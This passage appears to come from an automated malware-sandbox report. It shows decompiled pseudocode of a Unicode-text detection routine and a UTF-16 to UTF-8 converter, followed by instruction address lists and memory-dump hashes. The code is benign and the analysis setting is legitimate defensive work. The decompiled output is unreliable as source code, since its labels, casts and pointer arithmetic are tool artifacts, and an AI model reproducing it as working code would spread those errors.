				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1e496d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1e496920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1e496920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x1e3a1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M1E3A1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                        0x1e3a0d2b
                                        0x1e3a0d2e
                                        0x1e3a0d32
                                        0x1e3a0d39
                                        0x1e3a0d3b
                                        0x1e3a0d3d
                                        0x1e3a0d3f
                                        0x1e3a0d46
                                        0x1e3a0d4d
                                        0x1e3a0d54
                                        0x1e3a0d5b
                                        0x1e3a0d62
                                        0x1e3a0d69
                                        0x1e3a0d70
                                        0x1e3a0d77
                                        0x1e3a0d7e
                                        0x1e3a0d85
                                        0x1e3a0d88
                                        0x1e3a0d8b
                                        0x1e3a0d8e
                                        0x1e3a0d91
                                        0x1e3a0d94
                                        0x1e3a0d97
                                        0x1e3a0d9a
                                        0x1e3a0d9d
                                        0x1e3a0da6
                                        0x1e3a10e9
                                        0x1e3a10ee
                                        0x1e3a0db9
                                        0x1e3a0db9
                                        0x1e3a0dbc
                                        0x1e3fe9c7
                                        0x1e3fe9ca
                                        0x1e3fe9cd
                                        0x1e3fe9d0
                                        0x1e3fe9dd
                                        0x1e3fe9dd
                                        0x1e3a0dec
                                        0x1e3a0dec
                                        0x1e3a0dee
                                        0x1e3a0df3
                                        0x1e3a0ebf
                                        0x1e3a0ec0
                                        0x00000000
                                        0x1e3a0df9
                                        0x1e3a0df9
                                        0x1e3a0e1e
                                        0x1e3a0e21
                                        0x1e3a0e24
                                        0x1e3a0e27
                                        0x1e3a0e2a
                                        0x1e3a0e2d
                                        0x1e3a0e30
                                        0x1e3a0e36
                                        0x1e3a1040
                                        0x1e3a1043
                                        0x1e3a1049
                                        0x1e3a1049
                                        0x1e3a0e3c
                                        0x1e3a0e3f
                                        0x1e3a1007
                                        0x1e3a100a
                                        0x1e3a1010
                                        0x1e3a1010
                                        0x1e3a100a
                                        0x1e3a0e3f
                                        0x1e3a0e58
                                        0x1e3a0e5d
                                        0x1e3a1000
                                        0x1e3a0e63
                                        0x1e3a0e63
                                        0x1e3a0e63
                                        0x1e3a0e67
                                        0x1e3a0e69
                                        0x1e3a0e69
                                        0x1e3a0e6d
                                        0x1e3a0e70
                                        0x1e3a0e74
                                        0x1e3a0e76
                                        0x1e3a0e76
                                        0x1e3a0e7a
                                        0x1e3a0e7c
                                        0x1e3a0e7c
                                        0x1e3a0e83
                                        0x1e3a0e86
                                        0x1e3a0e87
                                        0x1e3a0e89
                                        0x1e3a0e8b
                                        0x1e3a0e91
                                        0x1e3a0e00
                                        0x1e3a0e03
                                        0x1e3a0e03
                                        0x1e3a0e07
                                        0x1e3a0e0f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3a0e0f
                                        0x1e3a0e97
                                        0x1e3a0e9c
                                        0x1e3a113e
                                        0x1e3a1141
                                        0x1e3a1143
                                        0x1e3a0eb1
                                        0x1e3a0eb1
                                        0x1e3a0eb4
                                        0x1e3a0eb6
                                        0x1e3a1110
                                        0x1e3a1112
                                        0x1e3fea25
                                        0x1e3fea25
                                        0x1e3a0ec3
                                        0x1e3a0ec3
                                        0x1e3a0ecb
                                        0x1e3a10fe
                                        0x1e3a0ed1
                                        0x1e3a0ed1
                                        0x1e3a0ed1
                                        0x1e3a0ed3
                                        0x1e3a0edb
                                        0x1e3fea2d
                                        0x1e3fea2f
                                        0x1e3fea31
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3fea37
                                        0x1e3fea37
                                        0x1e3fea3a
                                        0x1e3fea3e
                                        0x1e3fea47
                                        0x1e3fea4a
                                        0x1e3fea4c
                                        0x1e3fea4d
                                        0x1e3fea4d
                                        0x1e3fea4e
                                        0x1e3fea4e
                                        0x1e3fea51
                                        0x1e3fea52
                                        0x1e3fea52
                                        0x00000000
                                        0x1e3a0ee1
                                        0x1e3a0ee1
                                        0x1e3a0ee1
                                        0x1e3a0ee3
                                        0x1e3a0ee3
                                        0x1e3a0ee6
                                        0x1e3a0eec
                                        0x1e3fea5b
                                        0x1e3fea5d
                                        0x1e3a0ef6
                                        0x1e3a0ef8
                                        0x1e3fea6f
                                        0x1e3fea6f
                                        0x1e3a0efe
                                        0x1e3a0efe
                                        0x1e3a0f03
                                        0x1e3fea7b
                                        0x1e3fea7d
                                        0x00000000
                                        0x00000000
                                        0x1e3fea83
                                        0x1e3fea85
                                        0x00000000
                                        0x00000000
                                        0x1e3fea8b
                                        0x1e3fea91
                                        0x00000000
                                        0x00000000
                                        0x1e3fea97
                                        0x1e3fea9a
                                        0x1e3feaa0
                                        0x1e3feaa2
                                        0x1e3feaa2
                                        0x1e3feaae
                                        0x1e3feab3
                                        0x1e3feab6
                                        0x1e3feabf
                                        0x1e3feaca
                                        0x1e3feacd
                                        0x1e3fead1
                                        0x1e3fead1
                                        0x1e3feab8
                                        0x1e3feab8
                                        0x1e3feab8
                                        0x1e3fead2
                                        0x1e3fead9
                                        0x1e3a0f0e
                                        0x1e3a0f15
                                        0x1e3a0f17
                                        0x1e3a0f17
                                        0x1e3a0f1e
                                        0x1e3a0f23
                                        0x1e3feae1
                                        0x1e3feae1
                                        0x1e3a0f38
                                        0x1e3a0f3a
                                        0x1e3a0f3a
                                        0x1e3a0f49
                                        0x1e3a1108
                                        0x1e3a1108
                                        0x1e3a0f5b
                                        0x1e3a10c7
                                        0x1e3a10ca
                                        0x1e3a10cc
                                        0x00000000
                                        0x00000000
                                        0x1e3a10dc
                                        0x1e3a10de
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3a0f61
                                        0x1e3a0f61
                                        0x1e3a0f61
                                        0x1e3a0f67
                                        0x1e3a0f6b
                                        0x1e3a111d
                                        0x1e3a111d
                                        0x1e3a0f75
                                        0x1e3a0f77
                                        0x1e3a0f77
                                        0x1e3a0f85
                                        0x1e3a0f8b
                                        0x1e3a10b9
                                        0x1e3a10bc
                                        0x1e3feae9
                                        0x1e3feae9
                                        0x1e3a0f91
                                        0x1e3a0f91
                                        0x1e3a0f91
                                        0x1e3a0f96
                                        0x1e3a0f98
                                        0x1e3a0f9a
                                        0x1e3a0f9a
                                        0x1e3a0fa6
                                        0x1e3a107c
                                        0x1e3a107f
                                        0x1e3a108d
                                        0x00000000
                                        0x1e3a108d
                                        0x1e3a1081
                                        0x1e3a1087
                                        0x1e3feaf4
                                        0x1e3feafa
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3feb00
                                        0x00000000
                                        0x1e3a0fac
                                        0x1e3a0fac
                                        0x00000000
                                        0x1e3a0fac
                                        0x1e3a0fa6
                                        0x1e3a0f5b
                                        0x1e3a0f09
                                        0x1e3a0f09
                                        0x00000000
                                        0x1e3a0f09
                                        0x1e3fea63
                                        0x00000000
                                        0x1e3fea63
                                        0x1e3a0ef4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3a0ef4
                                        0x1e3a0ebc
                                        0x1e3a0ebc
                                        0x00000000
                                        0x1e3a0ebc
                                        0x1e3a0eb6
                                        0x1e3a1149
                                        0x1e3a114c
                                        0x1e3a114d
                                        0x00000000
                                        0x1e3a114d
                                        0x1e3a0ea4
                                        0x1e3a0ea7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3a0fb7
                                        0x1e3a0fb7
                                        0x1e3a0fbc
                                        0x1e3a0fc9
                                        0x1e3a0fc9
                                        0x1e3a0fce
                                        0x1e3a1020
                                        0x1e3a1025
                                        0x1e3a1094
                                        0x1e3a1094
                                        0x1e3a1099
                                        0x1e3fea04
                                        0x1e3fea04
                                        0x1e3fea09
                                        0x1e3fea1c
                                        0x1e3fea0b
                                        0x1e3fea0b
                                        0x1e3fea0e
                                        0x1e3fea14
                                        0x1e3fea14
                                        0x1e3fea0e
                                        0x1e3fea09
                                        0x1e3a1027
                                        0x1e3a1027
                                        0x1e3a1155
                                        0x1e3a102d
                                        0x1e3a102d
                                        0x1e3a102d
                                        0x1e3a1032
                                        0x1e3fe9fc
                                        0x1e3fe9fc
                                        0x1e3a1032
                                        0x1e3a1027
                                        0x00000000
                                        0x1e3a1025
                                        0x1e3a0fd0
                                        0x1e3fe9f4
                                        0x00000000
                                        0x1e3fe9f4
                                        0x1e3a0fd6
                                        0x1e3a0fd9
                                        0x1e3a1059
                                        0x1e3a1059
                                        0x1e3a105e
                                        0x1e3fe9ec
                                        0x1e3a1064
                                        0x1e3a1064
                                        0x1e3a1064
                                        0x1e3a1069
                                        0x1e3a10ac
                                        0x1e3a106b
                                        0x1e3a106b
                                        0x1e3a106e
                                        0x1e3a1074
                                        0x1e3a1074
                                        0x1e3a106e
                                        0x1e3a1069
                                        0x00000000
                                        0x1e3a105e
                                        0x1e3a0fdb
                                        0x1e3a10a4
                                        0x00000000
                                        0x1e3a10a4
                                        0x1e3a0fe1
                                        0x1e3a0fe4
                                        0x00000000
                                        0x00000000
                                        0x1e3a0fea
                                        0x1e3a0ff1
                                        0x00000000
                                        0x1e3a0ff8
                                        0x00000000
                                        0x00000000
                                        0x1e3fe9e4
                                        0x00000000
                                        0x00000000
                                        0x1e3a1018
                                        0x00000000
                                        0x00000000
                                        0x1e3a1051
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3a0ff1
                                        0x1e3a0fbe
                                        0x1e3a0fc3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3a0fc3
                                        0x1e3a0df3
                                        0x1e3fe9d5
                                        0x1e3fe9d7
                                        0x1e3a1128
                                        0x1e3a1128
                                        0x1e3a112b
                                        0x1e3a112d
                                        0x1e3a1133
                                        0x1e3a1133
                                        0x00000000
                                        0x1e3a112d
                                        0x00000000
                                        0x1e3fe9d7
                                        0x1e3a0dc2
                                        0x1e3a10f6
                                        0x1e3a0dd4
                                        0x1e3a0dd7
                                        0x1e3a0dda
                                        0x1e3a0de8
                                        0x1e3a0de9
                                        0x1e3a0de9
                                        0x1e3a0dda
                                        0x00000000
                                        0x1e3a0dc2
                                        0x1e3a0dac
                                        0x1e3a0dae
                                        0x1e3a0db3
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
                                        • Instruction ID: 88f218f0039f003e96c1d8a2eb9c9e775ce3d876f32cb603a9c7f160fa2be351
                                        • Opcode Fuzzy Hash: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
                                        • Instruction Fuzzy Hash: 96D18C71E046598BDB08CE9AC5A07AEFBF6EFC4350F108369E642E6285D77889C1CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3DEBB0, Relevance: .2, Instructions: 250COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E1E3DEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E1E3DED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t117 =  &(_t98[_t63 - 5]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                        0x1e3debb8
                                        0x1e3debbf
                                        0x1e3debc1
                                        0x1e3debc6
                                        0x00000000
                                        0x1e41b6d6
                                        0x1e3debcd
                                        0x1e3debd2
                                        0x1e3dec95
                                        0x1e41b6e0
                                        0x1e3dec9b
                                        0x1e3deca1
                                        0x1e3deca1
                                        0x1e3dec89
                                        0x00000000
                                        0x1e3dec89
                                        0x1e3debd8
                                        0x1e3debdd
                                        0x1e41b6ea
                                        0x00000000
                                        0x1e3debe3
                                        0x1e3debe5
                                        0x1e3debe7
                                        0x1e3debef
                                        0x1e3debf2
                                        0x00000000
                                        0x1e3debf5
                                        0x00000000
                                        0x1e3debf5
                                        0x1e3debf5
                                        0x1e3debf7
                                        0x1e41b6f6
                                        0x1e3dec7c
                                        0x1e3dec7c
                                        0x1e3dec7f
                                        0x1e3dec82
                                        0x1e3dec87
                                        0x00000000
                                        0x1e3dec87
                                        0x1e3dec1a
                                        0x1e3dec1a
                                        0x1e3dec25
                                        0x1e41b725
                                        0x1e41b72c
                                        0x1e41b72c
                                        0x1e3dec2d
                                        0x1e3dec31
                                        0x1e41b73c
                                        0x1e41b744
                                        0x1e41b748
                                        0x1e41b748
                                        0x1e41b749
                                        0x1e41b749
                                        0x1e41b74a
                                        0x1e41b74a
                                        0x1e3dec3e
                                        0x1e41b860
                                        0x00000000
                                        0x1e3dec44
                                        0x1e3dec47
                                        0x1e41b750
                                        0x1e41b758
                                        0x1e41b767
                                        0x1e41b775
                                        0x1e41b77c
                                        0x1e41b77f
                                        0x1e41b769
                                        0x1e41b76c
                                        0x1e41b76c
                                        0x1e41b781
                                        0x1e41b788
                                        0x1e41b78b
                                        0x1e41b75a
                                        0x1e41b75d
                                        0x1e41b75d
                                        0x1e41b78d
                                        0x1e41b792
                                        0x1e41b793
                                        0x1e41b793
                                        0x1e3dec54
                                        0x1e3dec56
                                        0x1e3dec57
                                        0x1e3dec59
                                        0x1e3dec5e
                                        0x1e3decaa
                                        0x1e3ded16
                                        0x1e3ded16
                                        0x1e3decaf
                                        0x1e3decb4
                                        0x1e3decb6
                                        0x1e3decb6
                                        0x1e3decb9
                                        0x1e3decbf
                                        0x1e41b7c1
                                        0x1e41b7c8
                                        0x1e41b7d3
                                        0x1e41b7db
